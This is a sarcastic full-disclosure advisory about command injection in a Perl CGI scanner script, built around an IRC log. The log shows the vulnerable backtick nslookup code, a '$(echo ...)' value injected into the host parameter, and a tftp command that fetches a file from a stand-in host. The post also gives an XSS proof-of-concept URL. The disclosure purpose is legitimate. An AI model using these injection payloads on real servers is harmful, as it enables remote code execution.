Wood's Infinity Project 3.69a Remote Command Execution

["badpack3t" <badpack3t () security-protocols com>]

This advisory is for "Wood's Infinity Project 3.69a" avaliable at:
http://exploit.wox.org/thecore/W-infscan-369a.zip

[17:10] * Now talking in #morning_wood
[17:10] * Topic is ''
[17:10] * Set by ChanServ on Wed Jun 11 04:19:51
[17:10] <b0iler> morning_wood knows security well?
[17:10] <b0iler> I need help.
[17:11] <b0iler> is this morning_wood?
[17:15] <{DWL}Vinyl> ya
[17:15] <{DWL}Vinyl> wassup
[17:15] <b0iler> you are any good at perl security?
[17:16] <{DWL}Vinyl> some ya
[17:16] <b0iler> I need help varifying if this vuln is exploitable.
[17:16] <{DWL}Vinyl> hey
[17:16] <{DWL}Vinyl> can you
[17:16] <{DWL}Vinyl> go to
[17:17] <{DWL}Vinyl> exploitlabs.com:6667
[17:17] <{DWL}Vinyl> .#0sec
[17:17] <{DWL}Vinyl> it my server

[17:17] * Now talking in #0sec
[17:17] * Topic is 'http://nothackers.org - 0day - Freedom of Voice -
Freedom of Choice'
[17:17] * Set by MrWood on Tue Jun 10 22:13:11
[17:17] <#0sec> Welcome to 0sec
[17:18] <b0iler>        @values = split(/\&/,$ENV{'QUERY_STRING'});
[17:18] <b0iler>        foreach $i (@values) {
[17:18] <b0iler>                ($varname, $mydata) = split(/=/,$i);
[17:18] <b0iler>                $FORM{$varname} = $mydata;
[17:18] <b0iler>        }
[17:18] <b0iler>        $host = "$FORM{'host'}";
[17:18] <b0iler>        $host =~ tr/+/ /;
[17:18] <b0iler>        $host =~ tr/\%/a/;
[17:18] <b0iler>         $host =~ tr/\;/b/;
[17:18] <b0iler>        $host =~ tr/</c/;
[17:19] <b0iler>        $host =~ tr/>/d/;
[17:19] <b0iler>        $host =~ tr/\|/e/;
[17:19] <b0iler>        $host =~ tr/\&/f/;
[17:19] <b0iler>        $host =~ tr/\^/g/;
[17:19] <b0iler>        $host =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C",
hex($1))/eg;
[17:19] <b0iler>        $hostname = `$nslookuplocation $host`;
[17:19] <MrWood> shell code?
[17:19] <b0iler> ?
[17:19] <b0iler> .cgi?host=$(echo 'h0n0!')
[17:19] <MrWood> hehe
[17:19] <b0iler> that would execute commands on this server.. right?
[17:20] <MrWood> you want to run this on a remote server?
[17:20] <b0iler> this is in a .cgi
[17:20] <MrWood> havin the .pl on it first
[17:20] <MrWood> ?
[17:20] <b0iler> I want to find vulnerabilities in this .cgi
[17:20] <b0iler> I believe this is one.
[17:20] <MrWood> ahhh
[17:20] <b0iler> you see.. the programmer of this .cgi is not very
knowledgble.
[17:20] <MrWood> do you have a httpd with perl?
[17:21] <b0iler> I think they have problems in their code.
[17:21] <MrWood> if you uploaded the cgi to me
[17:21] <MrWood> i could let you access it on my box, but i run NT
[17:22] <MrWood> wtf is         $host =~
s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
[17:22] <b0iler> that is converting url encoding into ascii
[17:22] <b0iler> %hexhex into ascii
[17:22] <MrWood> isint that hex for a serial port?
[17:23] <b0iler> MrWood: you already have the .cgi.
[17:23] <MrWood> i do?
[17:23] <b0iler> it is nph-exploitscanget.cgi
[17:23] <b0iler> you programmed it.
[17:23] <MrWood> where?
[17:23] <MrWood> url?
[17:23] <b0iler> http://exploit.wox.org/thecore/W-infscan-369a.zip
[17:24] <MrWood> the worst is'
[17:24] <MrWood> oon that
[17:24] <MrWood> there is a call
[17:24] <MrWood> to local nslookup
[17:24] <MrWood> if you replace
[17:24] <MrWood> 'nslookup'
[17:24] <MrWood> with ummm
[17:24] <MrWood> lets say
[17:25] <MrWood> tftp - yourhost.com get file.ext file.ext
[17:25] <MrWood> it should execute local
[17:25] <MrWood> :)
[17:25] <b0iler> what you say makes no sense at all.
[17:26] <MrWood> if you replace that call
[17:26] <MrWood> then upload it to remote server
[17:27] <b0iler> and get... *gasp* cgi privedges on a local server.  lol.
[17:27] <MrWood> it will execute the call you replaced when the script
hits that functionm
[17:27] <MrWood> yes
[17:27] <b0iler> I will be posting this log to FD list.
[17:30] <b0iler> your security list is a joke. your website is a joke.
your code is a joke.
[17:30] <MrWood> i have 3 advisorries on hold
[17:30] * Disconnected (Quit: joke.)

There is a massive xss problem in the 404 script mrwood uses.  here is PoC
for this 0day advisory: http://exploit.wox.org/<b>a</b>
There is a serious plain text password and default password problem in the
script avaliable at: http://take.candyfrom.us/bionet-logger1
-2.zip

There is also an advisory on 0day (http://nothackers.org) list's use of
it's own "wood-discloser" (some kind of strange full-discloser
mutation with no vendor notification, no exploit code, flakey
vulnerabilities, and "0days" which do not compile - they only form struct
ures of poorly written English sentances).  It claims it releases
information immediately, but as the log shows mrwood himself is withh
olding vulnerability information from the public.  According to mrwood's
own logic, this is putting 10trillion,billion,million people a
t risk from 0days and attack.  Wood-discloser will save us all from
attack!  Praise Ali!

peace out,

---------------------------
badpack3t
founder
www.security-protocols.com
---------------------------


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html